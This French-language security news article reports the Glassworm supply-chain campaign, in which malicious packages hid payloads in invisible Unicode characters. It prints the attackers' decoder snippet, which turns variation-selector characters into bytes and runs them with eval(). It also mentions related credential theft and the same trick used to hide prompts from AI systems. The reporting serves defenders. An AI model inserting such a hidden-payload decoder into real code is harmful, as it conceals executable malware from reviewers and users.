L'attaque de la chaîne d'approvisionnement utilise des caractères Unicode invisibles pour contourner la détection.

Des chercheurs en sécurité d'Aikido Security ont découvert une attaque de chaîne d'approvisionnement utilisant du code Unicode invisible pour dissimuler des fonctions malveillantes dans des paquets téléversés sur GitHub, NPM et Open VSX. Le groupe d'attaquants, surnommé Glassworm, a téléversé 151 paquets malveillants sur GitHub du 3 au 9 mars 2026.
Fonctionnement du code invisible
Les paquets malveillants utilisent des caractères Unicode provenant des zones d'usage public (également appelées accès d'usage public) qui sont invisibles lorsqu'ils sont visualisés dans les éditeurs, terminaux et interfaces de revue de code. Bien que la majeure partie du code semble normale, les fonctions et charges utiles malveillantes sont rendues à l'aide de ces caractères invisibles, rendant les revues manuelles de code et les défenses traditionnelles inefficaces.
Les caractères Unicode invisibles représentent chaque lettre de l'alphabet américain lorsqu'ils sont traités par les ordinateurs, mais s'affichent comme des espaces blancs ou des lignes vides pour les humains. Les interpréteurs JavaScript peuvent lire et exécuter ces caractères comme du code normal.
Implémentation technique
Dans un paquet analysé, les attaquants ont encodé une charge utile malveillante à l'aide de caractères invisibles. Le code comprend une fonction de décodage qui extrait les octets cachés et les transmet à eval() :
const s = v => [...v].map(
w => (
w = w.codePointAt(0),
w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 :
w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 :
null
)
).filter(n => n !== null);
eval(Buffer.from(s(``)).toString('utf-8'));
La chaîne entre backtiches passée à s() apparaît vide dans les visualiseurs mais contient des caractères invisibles qui se décodent en une charge utile malveillante complète. Dans des incidents précédents, les charges utiles décodées récupéraient et exécutaient des scripts de deuxième étape en utilisant Solana comme canal de livraison pour voler des jetons, identifiants et secrets.
Caractéristiques de l'attaque
Les paquets malveillants sont particulièrement difficiles à détecter car :
- Les parties visibles du code sont de haute qualité et réalistes
- Les modifications environnantes incluent des ajustements de documentation, des incréments de version, de petites refontes et des corrections de bogues
- Les changements sont stylistiquement cohérents avec les projets ciblés
- Les chercheurs soupçonnent que des LLM sont utilisés pour générer des paquets convaincants et légitimes
Cette technique Unicode a été utilisée pour la première fois en 2024 pour dissimuler des invites malveillantes fournies aux moteurs d'IA, et a depuis été adaptée pour des attaques de logiciels malveillants traditionnels. Les 151 paquets détectés représentent probablement une petite fraction de la campagne, car beaucoup ont été supprimés depuis le téléversement initial.
📖 Lire la source complète : HN AI Agents
👀 See Also

Clawndom : Un crochet de sécurité pour Claude Code pour bloquer les paquets npm vulnérables
Un développeur a créé Clawndom, un crochet open-source pour Claude Code qui vérifie les packages npm dans la base de données de vulnérabilités OSV.dev avant l'installation, bloquant les packages vulnérables connus tout en préservant l'autonomie de l'agent.

Le noyau Linux propose un système d'identité décentralisé pour remplacer la toile de confiance PGP
Les mainteneurs du noyau Linux travaillent sur une couche d'identité décentralisée appelée Linux ID pour remplacer l'actuel réseau de confiance PGP. Le système utilise des identifiants décentralisés (DID) de style W3C et des justificatifs vérifiables pour authentifier les développeurs sans nécessiter de sessions de signature de clés en face à face.

Le dépôt GitHub documente 16 techniques d'injection de prompt et des stratégies de défense pour les chats d'IA publics.
Un développeur a publié un dépôt GitHub détaillant des mesures de sécurité pour les chatbots d'IA publics après que des utilisateurs aient tenté des injections de prompt, des attaques de jeu de rôle, des astuces multilingues et des charges utiles encodées en base64. Le guide inclut une compétence de code Claude pour tester les 16 techniques d'injection documentées.

ClawSecure : Plateforme de Sécurité pour l'Écosystème OpenClaw
ClawSecure est une plateforme de sécurité conçue spécifiquement pour l'écosystème OpenClaw, proposant un protocole d'audit à 3 couches, une surveillance continue et une couverture des catégories OWASP ASI. Elle a audité plus de 3 000 compétences populaires et est disponible gratuitement sans inscription.